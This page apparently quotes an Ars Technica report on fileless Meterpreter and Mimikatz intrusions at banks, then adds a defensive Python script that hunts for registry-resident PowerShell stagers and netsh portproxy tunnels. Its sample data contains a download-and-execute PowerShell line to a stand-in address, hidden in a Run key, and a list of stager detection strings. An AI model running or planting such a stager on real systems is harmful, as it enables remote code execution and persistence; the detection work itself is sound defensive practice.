Duqu 2.0 is a strain of clever, hard-to-detect malware, closely related to Stuxnet, that stays resident in its hosts' memory without writing persistent files to the system's drives.
Kaspersky Lab is about to publish a report on fileless malware of this kind found on the networks of 140 banks and other organizations in 40 countries -- and because this kind of malware is so hard to detect, Kaspersky believes the true number of infections is much higher.
Kaspersky isn't sure how the malware spreads.
The researchers first discovered the malware late last year, when a bank's security team found a copy of Meterpreter—an in-memory component of Metasploit—residing inside the physical memory of a Microsoft domain controller. After conducting a forensic analysis, the researchers found that the Meterpreter code was downloaded and injected into memory using PowerShell commands. The infected machine also used Microsoft's NETSH networking tool to transport data to attacker-controlled servers. To obtain the administrative privileges necessary to do these things, the attackers also relied on Mimikatz. To reduce the evidence left in logs or hard drives, the attackers stashed the PowerShell commands into the Windows registry.
Fortunately, the evidence on the domain controller was intact, presumably because it hadn't been restarted before Kaspersky Lab researchers began their investigation. An analysis of the dumped memory contents and the Windows registries allowed the researchers to restore the Meterpreter and Mimikatz code. The attackers, the researchers later determined, had used the tools to collect passwords of system administrators and for the remote administration of infected host machines.
A rash of invisible, fileless malware is infecting banks around the globe
[Dan Goodin/Ars Technica]
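The two on-host traces the Ars excerpt describes, PowerShell commands parked in the registry to relaunch an in-memory Meterpreter and netsh used to move data out, are the things a defender can actually hunt for on a box that hasn't been rebooted. The script below is an added example written for this page; it is not Kaspersky's or Ars Technica's code and does not reproduce the real attackers' artifacts. It assumes the registry data has been pulled with a `.reg` export (for example `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run run.reg`) and that the netsh mechanism in use is the `portproxy` table shown by `netsh interface portproxy show all`; the excerpt names neither the key nor the netsh subcommand, so both are assumptions. The sample registry value and tunnel table are constructed, and the `-EncodedCommand` blob is built in code so it decodes correctly.

```python
"""Hunt for registry-resident PowerShell stagers and netsh portproxy tunnels.

Added example for this page (not code from the page, Kaspersky or Ars Technica).
Runs offline on a .reg export and on saved `netsh interface portproxy show all`
output; the sample data below is constructed, not taken from any incident.
"""
import base64
import ipaddress
import re

# Strings an in-memory stager almost always carries (download + in-memory eval).
STAGER_TOKENS = ("IEX", "Invoke-Expression", "DownloadString", "FromBase64String",
                 "Reflection.Assembly", "VirtualAlloc", "-W Hidden", "-NoP")
ENC_ARG = re.compile(r"-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
REG_KEY = re.compile(r"^\[(.+)\]$")
REG_VAL = re.compile(r'^"([^"]+)"="(.*)"$')
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand is base64 over the UTF-16LE bytes of the script text."""
    return base64.b64decode(blob).decode("utf-16le")


def script_text(data: str) -> str:
    """Return what a registry value would actually execute, decoding -enc if present."""
    m = ENC_ARG.search(data)
    if not m:
        return data
    try:
        return decode_encoded_command(m.group(1))
    except (ValueError, UnicodeDecodeError):
        return data  # not a valid blob; inspect the raw command line instead


def scan_reg_export(text: str) -> list:
    """Flag registry values that launch PowerShell with stager-like content."""
    findings, key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        k = REG_KEY.match(line)
        if k:
            key = k.group(1)
            continue
        v = REG_VAL.match(line)
        if not v or "powershell" not in v.group(2).lower():
            continue
        data = v.group(2).replace("\\\\", "\\")  # .reg files escape backslashes
        script = script_text(data)
        hits = [t for t in STAGER_TOKENS
                if t.lower() in script.lower() or t.lower() in data.lower()]
        if hits:
            findings.append({"key": key, "value": v.group(1),
                             "script": script, "indicators": hits})
    return findings


def scan_portproxy(output: str) -> list:
    """Parse `netsh interface portproxy show all`; mark tunnels to non-RFC1918 hosts."""
    entries = []
    for line in output.splitlines():
        parts = line.split()
        # Data rows are: listen-addr listen-port connect-addr connect-port
        if len(parts) == 4 and parts[1].isdigit() and parts[3].isdigit():
            try:
                ip = ipaddress.ip_address(parts[2])
                external = not any(ip in net for net in INTERNAL_NETS)
            except ValueError:
                external = True  # hostname rather than address: review it
            entries.append({"listen": f"{parts[0]}:{parts[1]}",
                            "connect": f"{parts[2]}:{parts[3]}",
                            "external": external})
    return entries


# --- Constructed sample data (assumed shapes, not real attack artifacts) ---
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.7/a')"
ENC = base64.b64encode(STAGER.encode("utf-16le")).decode()
SAMPLE_REG = f"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run]
"OneDrive"="C:\\\\Program Files\\\\OneDrive\\\\OneDrive.exe /background"
"Updater"="powershell.exe -NoP -W Hidden -enc {ENC}"
"""
SAMPLE_PORTPROXY = """
Listen on ipv4:             Connect to ipv4:

Address         Port        Address         Port
--------------- ----------  --------------- ----------
0.0.0.0         4444        203.0.113.7     443
127.0.0.1       8080        10.0.0.20       8080
"""


def hunt(reg_text: str = SAMPLE_REG, portproxy_text: str = SAMPLE_PORTPROXY) -> dict:
    """Run both checks and keep only the tunnels that leave the internal ranges."""
    return {"registry": scan_reg_export(reg_text),
            "tunnels": [e for e in scan_portproxy(portproxy_text) if e["external"]]}


if __name__ == "__main__":
    result = hunt()
    for f in result["registry"]:
        print(f"[registry] {f['key']}\\{f['value']}: {f['indicators']}\n    {f['script']}")
    for t in result["tunnels"]:
        print(f"[portproxy] {t['listen']} -> {t['connect']} (external)")
```

The registry side decodes `-EncodedCommand` before matching, because an encoded stager shows none of its indicator strings in the raw value; the tunnel side treats any forward to a non-RFC1918 address as worth a look rather than trying to guess what the attacker's infrastructure is. Both checks read saved output, so they can be run against a memory-and-registry collection from a host that, like the domain controller in the excerpt, has not been restarted.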